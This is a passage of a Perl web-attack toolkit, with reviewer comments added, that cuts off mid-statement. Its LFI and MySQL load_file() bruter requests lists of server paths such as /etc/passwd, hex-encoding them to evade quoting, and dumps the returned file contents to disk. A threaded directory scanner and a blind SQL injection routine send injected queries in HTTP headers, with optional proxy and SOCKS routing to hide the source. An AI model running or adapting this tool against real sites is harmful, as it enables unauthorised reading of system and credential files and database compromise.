  8187.            . "User-Agent: Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090716 Ubuntu/9.04 (jaunty) Shiretoko/3.5.1\r\n"
  8188.            . "Connection: close\r\n\r\n";
  8189.    print "----------------------------------------\n";
  8190.    print "You choose mode with SOCKS, try to find good in $socks_file ...\n";
  8191.    print "Timeout = 5 sec:\n";
  8192.    print "----------------------------------------\n";
  8193.    $socks_check = 0;
  8194.    $check_socks = socks_check();
  8195.   ($current_proxy_host,$current_proxy_port,$socks_type) = split(/:/,$check_socks);
  8196.   $proxy_message = "$current_proxy_host:$current_proxy_port, SOCKS" . $socks_type;
  8197.   if ($current_proxy_host) {
  8198.      $socks_check = 1;
  8199.      print "Will use --> $proxy_message\n";
  8200.   } else {
  8201.      $socks_check = 0;
  8202.      $proxy_message = "No";
  8203.      print "No good SOCKS in " . $socks_file . ", change mode. Exit...\n";
  8204.   }
  8205. }
  8206.     sub ascii_to_hex ($) {
  8207.                (my $str = shift) =~ s/(.|\n)/sprintf("%02lx", ord $1)/eg;
  8208.                $str = "0x" . $str;
  8209.              return $str;
  8210.     }
  8211.     use LWP::Simple;
  8212.     open(FILE, "<", $lrl_list);
  8213.     while(<FILE>) {
  8214.         chomp;
  8215.         push(@lrl_error, $_);
  8216.     }
  8217.     close(FILE);
  8218.     $size = 0;
  8219.     $size = @lrl_error;
  8220.     $size = $size -1;
  8221.     START3:
  8222.     print "----------------------------------------------------------------------------\n";
  8223.     print "                 LFI/Reader/Load_file() bruter mode\n";
  8224.     print "----------------------------------------------------------------------------\n";
  8225.     print "    [1] LFI/Reader - visual error when wrong query\n";
  8226.     print "    [2] LFI/Reader - unvisual error when wrong query\n";
  8227.     print "    [3] Mysql load_file - visual error when wrong query, magic_quotes=OFF\n";
  8228.     print "    [4] Mysql load_file - unvisual error when wrong query, magic_quotes=OFF\n";
  8229.     print "    [5] Mysql load_file - visual error when wrong query, magic_quotes=ON\n";
  8230.     print "    [6] Mysql load_file - unvisual error when wrong query, magic_quotes=ON\n";
  8231.     print "    [7] Main menu\n";
  8232.     print "----------------------------------\n";
  8233.     $choice = <STDIN>;
  8234.     chomp $choice;
  8235.     if ($choice == 1 || $choice == 3){
  8236.         print "scan URL: $lrl_url\n";
  8237.         print "----------------------\n";
  8238.         print "    [1] Start brute\n";
  8239.         print "    [2] Main menu\n";
  8240.         print "----------------------\n";
  8241.         $choice1 = <STDIN>;
  8242.         chomp $choice1;
  8243.         if ($choice1 == 1) {
  8244.             open( FILE1, ">>" . "z_" .$host2 . ".txt" ); # ???? ??? ?????? ???????????
  8245.             open( FILE2, ">>" . "z_" .$host2 . "_CONTENT.txt" ); # ???? ??? ?????? ???????????
  8246.             print FILE1 "-------------------------------------------------------\n";
  8247.             print FILE1 "LFI/Reader/Load_file() - visual error when wrong query\n";
  8248.             print FILE1 "-------------------------------------------------------\n";
  8249.             print "File: $lrl_list\n";
  8250.             print "Records: $size\n\n";
  8251.             print "----------------------\n";
  8252.             print "Request method - $method\n";
  8253.             print "Threads - $kol_threads\n";
  8254.             print "Proxy - $proxy_message\n";
  8255.             print "----------------------\n";
  8256.             $thr = $kol_threads; # ???-?? ???????
  8257.             $num = -1; # ?? ????????
  8258.             for(0..$thr) {
  8259.                 $trl[$_] = threads->create(\&gets10);
  8260.             }
  8261.             for(0..$thr) {
  8262.                 $trl[$_]->join;
  8263.             }
            # Worker thread for the "visual error" brute modes ([1] and [3]).
            # @lrl_error holds one candidate path per line of $lrl_list (read above)
            # and $size its last index. A response counts as a hit unless it
            # matches $lrl_error_message, "Bad Request" or "Parse error"; hits are
            # logged to FILE1 (URL) and FILE2 (full response body).
            # NOTE(review): bound check outside the lock -- same overrun as the
            # other gets* workers.
            sub gets10 {
               $| = 1;   # autoflush STDOUT for the "\r" progress counter
               while ($num<$size) {
                  { lock($num);
                  $num++; }   # reserve one list index per thread
                  $current1 = $lrl_error[$num];
                  $uri = $lrl_start . $current1 . $lrl_end;   # $lrl_start/$lrl_end set elsewhere
                  $current = $uri;
                  $host = $host2;   # reset the global each iteration
                  # scan_url() takes no arguments; presumably reads $current/$host.
                  $content = scan_url();
                  $lrl_flag = 1;
                  # NOTE(review): $lrl_error_message is interpolated as a regex, not
                  # matched literally; metacharacters in it (or an empty value, which
                  # makes Perl reuse the last successful pattern) change what counts
                  # as an error page.
                  if($content =~ m/$lrl_error_message/img || $content =~ m/Bad Request/img || $content =~ m/Parse error/img) {
                      $lrl_flag = 0;
                  }
                  if ($lrl_flag == 1) {
                       print "   ---> /" . $current1 . "\n";
                       print FILE1 "     "  . $current . "\n";
                       print FILE2 "\n\n\n====================================\n";
                       print FILE2 "     /"  . $current1 . "\n";
                       print FILE2 "====================================\n";
                       print FILE2 $content . "\n";
                  }
                  print $num . "\r";   # progress counter, overwritten in place
                  sleep $pause;        # per-request delay; $pause is set elsewhere
               }
            }
  8290.             print "-------------------------------------------------------------------------------\n";
  8291.             print "Saved in " . "z_" . $host2 . ".txt and CONTENT in z_" . $host2 . "_CONTENT.txt\n";
  8292.             close(FILE1);
  8293.             close(FILE2);
  8294.             goto START3;
  8295.         }
  8296.     }
  8297.     if ($choice == 2 || $choice == 4){
  8298.         print "scan URL: $lrl_url\n";
  8299.         print "----------------------\n";
  8300.         print "    [1] Start brute\n";
  8301.         print "    [2] Main menu\n";
  8302.         print "----------------------\n";
  8303.         $choice = <STDIN>;
  8304.         chomp $choice;
  8305.         if ($choice == 1) {
  8306.             open( FILE1, ">>" . "z_" .$host2 . ".txt" ); # ???? ??? ?????? ???????????
  8307.             open( FILE2, ">>" . "z_" .$host2 . "_CONTENT.txt" ); # ???? ??? ?????? ???????????
  8308.             print FILE1 "-------------------------------------------------------\n";
  8309.             print FILE1 "LFI/Reader/Load_file() - unvisual error when wrong query\n";
  8310.             print FILE1 "-------------------------------------------------------\n";
  8311.             print "File: $lrl_list\n";
  8312.             print "Records: $size\n\n";
  8313.             print "----------------------\n";
  8314.             print "ONLY GET METHOD FOR THIS MODE!!! NO PROXY!!!! Continue ? (1/0): \n";
  8315.             $choice = <STDIN>;
  8316.             chomp $choice;
  8317.             if ($choice == 1) {
  8318.                  print "----------------------\n";
  8319.                  print "Get wrong URL, wait please...";
  8320.                  $space = "";
  8321.                  $wrong_test = "etc/passwd1";
  8322.                  $urii = $lrl_start . $wrong_test . $lrl_end;
  8323.                  $current = $urii;
  8324.                  $content = get($urii);
  8325.                  sleep 1;
  8326.                  $content  =~ s/$wrong_test/$space/egimosx;
  8327.                  $wrong_url_length = length($content);
  8328.                  print "OK\n";
  8329.                  print "----------------------\n";
  8330.                  $thr = $kol_threads; # ???-?? ???????
  8331.                  $num = -1; # ?? ????????
  8332.                  for(0..$thr) {
  8333.                      $trl[$_] = threads->create(\&gets11);
  8334.                  }
  8335.                  for(0..$thr) {
  8336.                      $trl[$_]->join;
  8337.                  }
                 # Worker thread for the "unvisual error" brute modes ([2] and [4]).
                 # Fetches each candidate with LWP::Simple::get() directly (no
                 # scan_url(), so none of the proxy/SOCKS/cookie handling applies),
                 # strips the candidate string from the body and compares the
                 # remaining length with $wrong_url_length, the baseline measured
                 # above from a deliberately wrong path. Matching length, "Bad
                 # Request" or "Parse error" means "not a hit".
                 # NOTE(review): bound check outside the lock -- same overrun as the
                 # other gets* workers.
                 sub gets11 {
                      $| = 1;   # autoflush STDOUT for the "\r" progress counter
                      while ($num<$size) {
                            { lock($num);
                            $num++; }   # reserve one list index per thread
                            $current1 = $lrl_error[$num];
                            $uri = $lrl_start . $current1 . $lrl_end;   # $lrl_start/$lrl_end set elsewhere
                            $current = $uri;
                            $content = get($uri);   # LWP::Simple; undef on failure
                            # NOTE(review): /o compiles the pattern once with the first
                            # $current1 seen by this thread, so later iterations keep
                            # stripping that first path rather than the current one;
                            # /x also treats whitespace and '#' in $current1 as pattern
                            # syntax. Both affect the length comparison below.
                            $content  =~ s/$current1/$space/egimosx;
                            $content_length = length($content);
                            $lrl_flag = 1;
                            if($content_length == $wrong_url_length || $content =~ m/Bad Request/img || $content =~ m/Parse error/img) {
                                 $lrl_flag = 0;
                            }
                            if ($lrl_flag == 1) {
                                 print "   ---> /" . $current1 . "\n";
                                 print FILE1 "     "  . $current . "\n";
                                 print FILE2 "\n\n\n====================================\n";
                                 print FILE2 "     /"  . $current1 . "\n";
                                 print FILE2 "====================================\n";
                                 print FILE2 $content . "\n";
                            }
                            print $num . "\r";   # progress counter, overwritten in place
                            sleep $pause;        # per-request delay; $pause is set elsewhere
                      }
                 }
  8365.                  print "-------------------------------------------------------------------------------\n";
  8366.                  print "Saved in " . "z_" . $host2 . ".txt and CONTENT in z_" . $host2 . "_CONTENT.txt\n";
  8367.                  close(FILE1);
  8368.                  close(FILE2);
  8369.                  goto START3;
  8370.             }
  8371.             if ($choice == 0) {
  8372.                  close(FILE1);
  8373.                  close(FILE2);
  8374.                  goto START3;
  8375.             }
  8376.         }
  8377.     }
  8378.     if ($choice == 6){
  8379.         print "scan URL: $lrl_url\n";
  8380.         print "----------------------\n";
  8381.         print "    [1] Start brute\n";
  8382.         print "    [2] Main menu\n";
  8383.         print "----------------------\n";
  8384.         $choice = <STDIN>;
  8385.         chomp $choice;
  8386.         if ($choice == 1) {
  8387.             open( FILE1, ">>" . "z_" .$host2 . ".txt" ); # ???? ??? ?????? ???????????
  8388.             open( FILE2, ">>" . "z_" .$host2 . "_CONTENT.txt" ); # ???? ??? ?????? ???????????
  8389.             print FILE1 "-------------------------------------------------------\n";
  8390.             print FILE1 "LFI/Reader/Load_file() - unvisual error when wrong query\n";
  8391.             print FILE1 "-------------------------------------------------------\n";
  8392.             print "File: $lrl_list\n";
  8393.             print "Records: $size\n\n";
  8394.             print "----------------------\n";
  8395.             print "ONLY GET METHOD FOR THIS MODE!!! NO PROXY!!!! Continue ? (1/0): \n";
  8396.             $choice = <STDIN>;
  8397.             chomp $choice;
  8398.             if ($choice == 1) {
  8399.                  print "----------------------\n";
  8400.                  print "Get wrong URL, wait please...";
  8401.                  $space = "";
  8402.                  $wrong_test1 = "/etc/passwd1";
  8403.                  $wrong_test = ascii_to_hex $wrong_test1;
  8404.                  $urii = $lrl_start . $wrong_test . $lrl_end;
  8405.                  $current = $urii;
  8406.                  $content = get($urii);
  8407.                  sleep 1;
  8408.                  $content  =~ s/$wrong_test/$space/egimosx;
  8409.                  $wrong_url_length = length($content);
  8410.                  print "OK\n";
  8411.                  print "----------------------\n";
  8412.                  $thr = $kol_threads; # ???-?? ???????
  8413.                  $num = -1; # ?? ????????
  8414.                  for(0..$thr) {
  8415.                     $trl[$_] = threads->create(\&gets12);
  8416.                  }
  8417.                  for(0..$thr) {
  8418.                     $trl[$_]->join;
  8419.                  }
                 # Worker thread for mode [6] ("unvisual error", magic_quotes=ON):
                 # same length-comparison logic as gets11, but the candidate is
                 # prefixed with "/" and hex-encoded via ascii_to_hex() before it is
                 # placed in the URL; the baseline $wrong_url_length was measured
                 # above with the same encoding. Hits are logged to FILE1 (plain and
                 # encoded form) and FILE2 (full response body).
                 # NOTE(review): bound check outside the lock -- same overrun as the
                 # other gets* workers.
                 sub gets12 {
                     $| = 1;   # autoflush STDOUT for the "\r" progress counter
                     while ($num<$size) {
                           { lock($num);
                           $num++; }   # reserve one list index per thread
                           $current2 = "/" . $lrl_error[$num];   # human-readable form for the logs
                           $current1 = ascii_to_hex $current2;   # "0x..." form used in the request
                           $uri = $lrl_start . $current1 . $lrl_end;   # $lrl_start/$lrl_end set elsewhere
                           $current = $uri;
                           $content = get($uri);   # LWP::Simple; undef on failure
                           # NOTE(review): as in gets11, /o freezes the pattern at the
                           # first $current1 this thread sees, so later iterations strip
                           # the wrong string before the length comparison.
                           $content  =~ s/$current1/$space/egimosx;
                           $content_length = length($content);
                           $lrl_flag = 1;
                           if($content_length == $wrong_url_length || $content =~ m/Bad Request/img || $content =~ m/Parse error/img) {
                               $lrl_flag = 0;
                           }
                           if ($lrl_flag == 1) {
                               print "   ---> " . $current2 . "\n";
                               print FILE1 "------------------------------------\n";
                               print FILE1 "  $current2\n";
                               print FILE1 "------------------------------------\n";
                               print FILE1 "     "  . $current . "\n";
                               print FILE2 "\n\n\n====================================\n";
                               print FILE2 "     /"  . $current2 . "\n";
                               print FILE2 "====================================\n";
                               print FILE2 $content . "\n";
                           }
                           print $num . "\r";   # progress counter, overwritten in place
                           sleep $pause;        # per-request delay; $pause is set elsewhere
                     }
                 }
  8451.                  print "-------------------------------------------------------------------------------\n";
  8452.                  print "Saved in " . "z_" . $host2 . ".txt and CONTENT in z_" . $host2 . "_CONTENT.txt\n";
  8453.                  close(FILE1);
  8454.                  close(FILE2);
  8455.                  goto START3;
  8456.             }
  8457.             if ($choice == 0) {
  8458.                  close(FILE1);
  8459.                  close(FILE2);
  8460.                  goto START3;
  8461.             }
  8462.         }
  8463.     }
        # Sub-menu [5] of the LFI bruter.  Requests every entry of @lrl_error between
        # $lrl_start and $lrl_end with $kol_threads+1 worker threads and logs each
        # candidate whose response does NOT contain the configured error text.  Control
        # goes back to the START3 label (outside this excerpt) via goto; the enclosing
        # if-block also begins before this excerpt.
  8464.     if ($choice == 5){
  8465.         print "scan URL: $lrl_url\n";
  8466.         print "----------------------\n";
  8467.         print "    [1] Start brute\n";
  8468.         print "    [2] Main menu\n";
  8469.         print "----------------------\n";
  8470.         $choice1 = <STDIN>;
  8471.         chomp $choice1;
  8472.         if ($choice1 == 1) {
                # Two-arg opens on bareword handles, return values unchecked: if either
                # file cannot be created every later print to it fails silently.  The file
                # name is built from $host2, i.e. from the target URL, without sanitising.
  8473.             open( FILE1, ">>" . "z_" .$host2 . ".txt" ); # results log (append); original comment not recoverable from the paste
  8474.             open( FILE2, ">>" . "z_" .$host2 . "_CONTENT.txt" ); # raw response bodies (append); original comment not recoverable
  8475.             print FILE1 "-------------------------------------------------------\n";
  8476.             print FILE1 "LFI/Reader/Load_file() - visual error when wrong query\n";
  8477.             print FILE1 "-------------------------------------------------------\n";
  8478.             print "File: $lrl_list\n";
  8479.             print "Records: $size\n\n";
  8480.             print "----------------------\n";
  8481.             print "Request method - $method\n";
  8482.             print "Threads - $kol_threads\n";
  8483.             print "Proxy - $proxy_message\n";
  8484.             print "----------------------\n";
  8485.             $thr = $kol_threads; # number of worker threads
                # NOTE: 0..$thr is inclusive, so $kol_threads+1 threads are started, one
                # more than the "Threads - $kol_threads" line above reports.
  8486.             $num = -1; # shared work index (threads::shared); the first worker bumps it to 0
  8487.             for(0..$thr) {
  8488.                 $trl[$_] = threads->create(\&gets13);
  8489.             }
  8490.             for(0..$thr) {
  8491.                 $trl[$_]->join;
  8492.             }
                # Worker thread body.  A named sub is compiled once at file scope, so
                # nesting it inside the if-block does not limit where it is visible.
  8493.             sub gets13 {
  8494.                $| = 1;
                   # The bound check reads $num without holding the lock, so two workers can
                   # both pass it and one of them increments $num past $size; $lrl_error[$num]
                   # is then undef and a bare "/" candidate is requested.
  8495.                while ($num<$size) {
  8496.                   { lock($num);
  8497.                   $num++; }
  8498.                   $current2 = "/" . $lrl_error[$num];
  8499.                   $current1 = ascii_to_hex $current2;   # helper defined elsewhere in the file
  8500.                   $uri = $lrl_start . $current1 . $lrl_end;
  8501.                   $current = $uri;
  8502.                   $current_log = $lrl_start . $current2 . $lrl_end;   # assigned but not read anywhere in this excerpt
  8503.                   $host = $host2;
  8504.                   $content = scan_url();   # reads the $current/$host globals; defined elsewhere
  8505.                   $lrl_flag = 1;
                      # $lrl_error_message is interpolated as a regex, not as literal text;
                      # wrap it in \Q...\E if it may contain metacharacters.
  8506.                   if($content =~ m/$lrl_error_message/img || $content =~ m/Bad Request/img || $content =~ m/Parse error/img) {
  8507.                       $lrl_flag = 0;
  8508.                   }
                      # No lock around the file writes: lines written by concurrent workers
                      # can interleave in FILE1/FILE2.
  8509.                   if ($lrl_flag == 1) {
  8510.                        print "   ---> " . $current2 . "\n";
  8511.                        print FILE1 "------------------------------------\n";
  8512.                        print FILE1 "  $current2\n";
  8513.                        print FILE1 "------------------------------------\n";
  8514.                        print FILE1 "     "  . $current . "\n";
  8515.                        print FILE2 "\n\n\n====================================\n";
  8516.                        print FILE2 "     /"  . $current2 . "\n";
  8517.                        print FILE2 "====================================\n";
  8518.                        print FILE2 $content . "\n";
  8519.                   }
  8520.                   print $num . "\r";   # progress counter, overwritten in place
  8521.                   sleep $pause;
  8522.                }
  8523.             }
  8524.             print "-------------------------------------------------------------------------------\n";
  8525.             print "Saved in " . "z_" . $host2 . ".txt and CONTENT in z_" . $host2 . "_CONTENT.txt\n";
  8526.             close(FILE1);
  8527.             close(FILE2);
  8528.             goto START3;   # label is outside this excerpt
  8529.         }
                # Menu item [2] has no branch of its own: any $choice1 other than 1 just
                # falls through to the checks below.
  8530.     }
  8531.     if ($choice == 7) {goto START_global}
  8532. }
  8533. ## End LFI bruter
  8534. ##############################################################################################################
  8535. ## Scan site for folders & files mode ##
        ## Mode [9]: requests each entry of $folder_list under $scan_url and reports the
        ## paths whose response matches none of the regexes in $error_list.  Re-entered
        ## via goto START2 after every scan.
  8536. if ($choice == 9) {
  8537.     START2:
        # Only an https URL sets $host1 here; for plain http its value must come from
        # earlier code outside this excerpt.  "https:\/\/?" also accepts "https:/".
  8538. if ($scan_url =~ m/^https:\/\/?([^\/]+)/i) {
  8539.    $host1 = $1;
  8540.    $https_flag = 1;
  8541.    print "----------------------\n";
  8542.    print "HTTPS mode enabled\n";
  8543.    print "----------------------\n";
  8544. }
  8545.     $host = $host1;
        # One-time login for HTTPS targets: POSTs the configured form data and keeps
        # whatever collect() extracts in the thread-shared $ck1 for later req() calls.
  8546. if ($https_mode_auth == 1 && $https_auth_check == 0 && $https_flag == 1) {
  8547.     print "-----------------------------------------\n";
  8548.     print "Authorization required, wait please....";
  8549.     my $answ1 = req($host, $https_auth_script_path, 'POST', $https_auth_post_data, 0);
  8550.     $ck1 = collect($answ1);
  8551.     $https_auth_check = 1;
  8552.     print " DONE\n";
  8553.     print "-----------------------------------------\n";
  8554. }
        # One-time SOCKS probe.  $check_host is never assigned in this block, so the
        # Host: header of the probe carries whatever an earlier mode left in it.
  8555.     if ($use_socks == 1 && $socks_check == 0) {
  8556.   $check_url = $host;
  8557.   our $query = "GET / HTTP/1.$http_protocol\r\n"
  8558.            . "Host: $check_host\r\n"
  8559.            . "Referer: http://" . $check_url . "\r\n"
  8560.            . "Accept: */*\r\n"
  8561.            . "User-Agent: Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090716 Ubuntu/9.04 (jaunty) Shiretoko/3.5.1\r\n"
  8562.            . "Connection: close\r\n\r\n";
  8563.    print "----------------------------------------\n";
  8564.    print "You choose mode with SOCKS, try to find good in $socks_file ...\n";
  8565.    print "Timeout = 5 sec:\n";
  8566.    print "----------------------------------------\n";
  8567.    $socks_check = 0;
  8568.    $check_socks = socks_check();   # sub defined elsewhere; split below expects "host:port:type"
  8569.   ($current_proxy_host,$current_proxy_port,$socks_type) = split(/:/,$check_socks);
  8570.   $proxy_message = "$current_proxy_host:$current_proxy_port, SOCKS" . $socks_type;
  8571.   if ($current_proxy_host) {
  8572.      $socks_check = 1;
  8573.      print "Will use --> $proxy_message\n";
  8574.   } else {
  8575.      $socks_check = 0;
  8576.      $proxy_message = "No";
                # The message says "Exit" but nothing exits: the scan simply continues
                # without SOCKS.
  8577.      print "No good SOCKS in " . $socks_file . ", change mode. Exit...\n";
  8578.   }
  8579. }
  8580.     print "----------------------------------\n";
  8581.     print "Scan site for folders & files mode\n";
  8582.  
  8583.     print "----------------------------------\n";
  8584.     print "    [1] Start scan\n";
  8585.     print "    [2] Main menu\n";
  8586.     print "----------------------------------\n";
  8587.     $choice = <STDIN>;
  8588.     chomp $choice;
  8589.     if ($choice == 1) {
        # Two-arg, unchecked open on a name derived from the target host.
  8590.         open( FILE1, ">>" . "z_" .$host1 . ".txt" ); # results log (append); original comment not recoverable from the paste
  8591.         print FILE1 "----------------------------------\n";
  8592.         print FILE1 "Scan site for folders & files mode\n";
  8593.         print FILE1 "----------------------------------\n";
  8594.         print "Scan URL: $scan_url\n";
        # @error and @folder are appended to but never reset, and this code is
        # re-entered via goto START2 after each scan, so a second run duplicates every
        # entry and doubles $size/$size1.  Both opens are unchecked.
  8595.         open(FILE, "<", $error_list);
  8596.         while(<FILE>) {
  8597.             chomp;
  8598.             push(@error, $_);
  8599.         }
  8600.         close(FILE);
  8601.         $size = 0;
  8602.         $size = @error;
  8603.         open(FILE2, "<", $folder_list);
  8604.         while(<FILE2>) {
  8605.             chomp;
  8606.             push(@folder, $_);
  8607.         }
  8608.         close(FILE2);
  8609.         $size1 = 0;
  8610.         $size1 = @folder;
  8611.         print "---------------------------------\n";
  8612.         print "File with errors: $error_list\n";
  8613.         print "File with folders: $folder_list\n";
  8614.         print "Folders: $size1\n";
  8615.         print "---------------------------------\n";
  8616.         print "Request method - $method\n";
  8617.         print "Threads - $kol_threads\n";
  8618.         print "Proxy - $proxy_message\n";
  8619.         print "----------------------\n";
  8620.         $thr = $kol_threads; # number of worker threads
               # NOTE: 0..$thr is inclusive, so $kol_threads+1 workers are started.
  8621.        $num = -1; # shared work index (threads::shared); the first worker bumps it to 0
  8622.        for(0..$thr) {
  8623.             $trl[$_] = threads->create(\&gets8);
  8624.        }
  8625.        for(0..$thr) {
  8626.             $trl[$_]->join;
  8627.        }
               # Worker thread body (compiled at file scope despite the nesting).
  8628.        sub gets8 {
  8629.             $| = 1;
               # The bound check is outside the lock: a worker can increment $num past
               # $size1 and then request $scan_url . "/" with an undef entry.
  8630.             while ($num<$size1) {
  8631.                 { lock($num);
  8632.                $num++; }
  8633.                $current1 = $folder[$num];
  8634.                $uri = $scan_url . "/" . $current1;
  8635.                $current = $uri;
  8636.                $host = $host1;
  8637.                $content = scan_url();   # reads the $current/$host globals; defined elsewhere
  8638.                $i = 0;
  8639.                $flag = 1;
               # Each $error[$i] is interpolated as a regex, not as literal text.
  8640.                while ($i<$size) {
  8641.                    if($content =~ m/$error[$i]/img) {$flag = 0}
  8642.                    $i++;
  8643.                }
  8644.                if ($flag == 1) {   # no error pattern matched: the path is reported
  8645.                        print "   ---> " . $uri . "\n";
  8646.                        print FILE1 "     - "  . $uri . "\n";   # no lock: concurrent workers may interleave lines
  8647.                }
  8648.                print $num . "\r";   # progress counter, overwritten in place
  8649.                sleep $pause;
  8650.             }
  8651.        }
  8652.        print "----------\n";
  8653.        print "Saved in " . "z_" . $host1 . ".txt\n";
  8654.        close(FILE1);
  8655.        goto START2;
  8656.  
  8657.     }
  8658.     if ($choice == 2) {
  8659.        goto START_global;
  8660.     }
  8661. }
  8662. ######################################################################################################################
        # Blind check, header variant.  Sends one request for $bl_url (global) with
        # $bl_query written as an extra raw header line when $sql_header is set, then
        # classifies the response by $bl_error: with $bl_error_type == 1 a match means
        # TRUE, with 0 a match means FALSE.  Returns $result (global): 1 for TRUE, 0 for
        # FALSE.  Side effects: overwrites the $host/$current/$res/$socket/$query globals
        # and rewrites $bl_query in place; blind_t()/blind_f() only print in test mode.
  8663. sub wr_check_HEADER {
  8664.   $result = 0;
  8665.   $host = $host3;
  8666.   $current = $bl_url;
        # Mutates the global: every call replaces the literal $search (quoted by \Q) in
        # $bl_query with $replacement, so a second call works on the already-edited text.
  8667.   $bl_query =~ s!\Q$search!$replacement!g;
  8668.   $res = "";
        # With an empty URL or query nothing is sent; the sub then falls off the end and
        # the caller receives the guard's false value rather than an explicit 0.  The
        # same happens when a connect below fails.
  8669. if($current && $bl_query){
  8670. if ($test_mode==1) {
  8671.     print "===============================================\n";
  8672.     print "URL: $current\n";
  8673.     print "HEADER query: $bl_query\n";
  8674. }
  8675. if ($https_flag == 0) {
  8676.   if ($socks_check == 0) {
  8677.        if ($use_proxy == 0) {
        # IO::Socket::INET looks for the keys Proto and Timeout; PeerProto and TimeOut
        # are not recognised, so the connect is not bounded by $timeout (Proto defaults
        # to tcp anyway).
  8678.             if ($socket=IO::Socket::INET->new( PeerAddr => $host, PeerPort => 80, PeerProto => 'tcp', TimeOut => $timeout)) {
        # Header lines end in "\n" rather than the CRLF HTTP specifies; $method is
        # expected to hold the request verb here (set elsewhere in the file).
  8679.                 print $socket "$method $current HTTP/1.$http_protocol\n";
  8680.                 print $socket "Host: $host\n";
  8681.                 if ($cookie) {
  8682.                     print $socket "Cookie: $cookie\n";
  8683.                 }
  8684.                 print $socket "Accept: */*\n";
  8685.                 if ($referer) {
  8686.                     print $socket "Http-Referer: $referer\n";   # non-standard name; the HTTP header is "Referer"
  8687.                 }
  8688.                 if ($user_agent) {
  8689.                     print $socket "User-Agent: $user_agent\n";
  8690.                 }
  8691.                 if ($sql_header) {
  8692.                     print $socket "$bl_query\n";   # written verbatim as one header line
  8693.                 }
  8694.                 print $socket "Pragma: no-cache\n";
  8695.                 print $socket "Cache-Control: no-cache\n";
  8696.                 print $socket "Content-Type: application/x-www-form-urlencoded\n";
  8697.                 print $socket "Connection: close\n\n";
  8698.                 $socket->autoflush(1);
        # The outer while reads the status line into $_, and the inner modifier loop
        # then overwrites $_ with each following line, so the status line never reaches
        # $res (a one-line response leaves $res empty).  Both classifying branches
        # return from inside the loop; the close after the loop is only reached when
        # $bl_error_type is neither 0 nor 1.
  8699.                 while (<$socket>) {
  8700.                    $res .= $_ while <$socket>;
  8701.                    if ($bl_error_type == 1) {
  8702.                        if($res =~ m/$bl_error/img) {   # $bl_error is a regex, not literal text
  8703.                           close $socket;
  8704.                           $result = 1;
  8705.                           blind_t();
  8706.                           return $result;
  8707.                        } else {
  8708.                           close $socket;
  8709.                           blind_f();
  8710.                           return $result;
  8711.                        }
  8712.                    }
        # Unlike the branch above (and the proxy path below) this one returns without
        # closing $socket; the handle is only released when the global is reassigned.
  8713.                    if ($bl_error_type == 0) {
  8714.                        if($res =~ m/$bl_error/img) {
  8715.                           blind_f();
  8716.                            return $result;
  8717.                        } else {
  8718.                            $result = 1;
  8719.                           blind_t();
  8720.                            return $result;
  8721.                        }
  8722.                    }
  8723.                 }
  8724.                 close $socket;
  8725.             }
  8726.        } else {
        # HTTP proxy path: the same request, connected to $current_proxy_host:
        # $current_proxy_port instead of $host (same unrecognised option names and the
        # same status-line loss as above).
  8727.             if ($socket=IO::Socket::INET->new( PeerAddr => $current_proxy_host, PeerPort => $current_proxy_port, PeerProto => 'tcp', TimeOut => $timeout)) {
  8728.                 print $socket "$method $current HTTP/1.$http_protocol\n";
  8729.                 print $socket "Host: $host\n";
  8730.                 if ($cookie) {
  8731.                     print $socket "Cookie: $cookie\n";
  8732.                 }
  8733.                 print $socket "Accept: */*\n";
  8734.                 if ($referer) {
  8735.                     print $socket "Http-Referer: $referer\n";   # non-standard name; the HTTP header is "Referer"
  8736.                 }
  8737.                 if ($user_agent) {
  8738.                     print $socket "User-Agent: $user_agent\n";
  8739.                 }
  8740.                 if ($sql_header) {
  8741.                     print $socket "$bl_query\n";
  8742.                 }
  8743.                 print $socket "Pragma: no-cache\n";
  8744.                 print $socket "Cache-Control: no-cache\n";
  8745.                 print $socket "Content-Type: application/x-www-form-urlencoded\n";
  8746.                 print $socket "Connection: close\n\n";
  8747.                 $socket->autoflush(1);
  8748.                 while (<$socket>) {
  8749.                    $res  .= $_ while <$socket>;
  8750.                    if ($bl_error_type == 1) {
  8751.                        if($res =~ m/$bl_error/img) {
  8752.                           close $socket;
  8753.                           blind_t();
  8754.                           $result = 1;
  8755.                           return $result;
  8756.                        } else {
  8757.                           close $socket;
  8758.                           blind_f();
  8759.                           return $result;
  8760.                        }
  8761.                    }
  8762.                    if ($bl_error_type == 0) {
  8763.                        if($res =~ m/$bl_error/img) {
  8764.                            close $socket;
  8765.                           blind_f();
  8766.                            return $result;
  8767.                        } else {
  8768.                            close $socket;
  8769.                           blind_t();
  8770.                            $result = 1;
  8771.                            return $result;
  8772.                        }
  8773.                    }
  8774.                 }
  8775.                 close $socket;
  8776.             }
  8777.       }
  8778.    } else {
        # SOCKS path: the request is assembled into the package global $query for
        # socks_get() (defined elsewhere).  Four near-identical variants differ only in
        # whether the Cookie: line and the $bl_query line are present.  Unlike the
        # direct path, "Referer:" is emitted even when $referer is empty, and the
        # Content-Type line ends in "\n" while every other line uses "\r\n".
  8779.       $check_url = $current;
  8780.       $check_host = $host;
  8781.     if ($cookie) {
  8782.      if ($sql_header) {
  8783.           our $query = "$method $check_url HTTP/1.$http_protocol\r\n"
  8784.            . "Host: $check_host\r\n"
  8785.            . "Cookie: $cookie\r\n"
  8786.            . "Referer: " . $referer . "\r\n"
  8787.            . "Accept: */*\r\n"
  8788.            . "User-Agent: $user_agent\r\n"
  8789.            . "Content-Type: application/x-www-form-urlencoded\n"
  8790.            . "$bl_query\r\n"  
  8791.            . "Connection: close\r\n\r\n";
  8792.         } else {
  8793.            our $query = "$method $check_url HTTP/1.$http_protocol\r\n"
  8794.            . "Host: $check_host\r\n"
  8795.            . "Cookie: $cookie\r\n"
  8796.            . "Referer: " . $referer . "\r\n"
  8797.            . "Accept: */*\r\n"
  8798.            . "User-Agent: $user_agent\r\n"
  8799.            . "Connection: close\r\n\r\n";
  8800.  
  8801.         }
  8802.     } else {
  8803.       if ($sql_header) {
  8804.           our $query = "$method $check_url HTTP/1.$http_protocol\r\n"
  8805.            . "Host: $check_host\r\n"
  8806.            . "Referer: " . $referer . "\r\n"
  8807.            . "Accept: */*\r\n"
  8808.            . "User-Agent: $user_agent\r\n"
  8809.            . "Content-Type: application/x-www-form-urlencoded\n"
  8810.            . "$bl_query\r\n"  
  8811.            . "Connection: close\r\n\r\n";
  8812.         } else {
  8813.            our $query = "$method $check_url HTTP/1.$http_protocol\r\n"
  8814.            . "Host: $check_host\r\n"
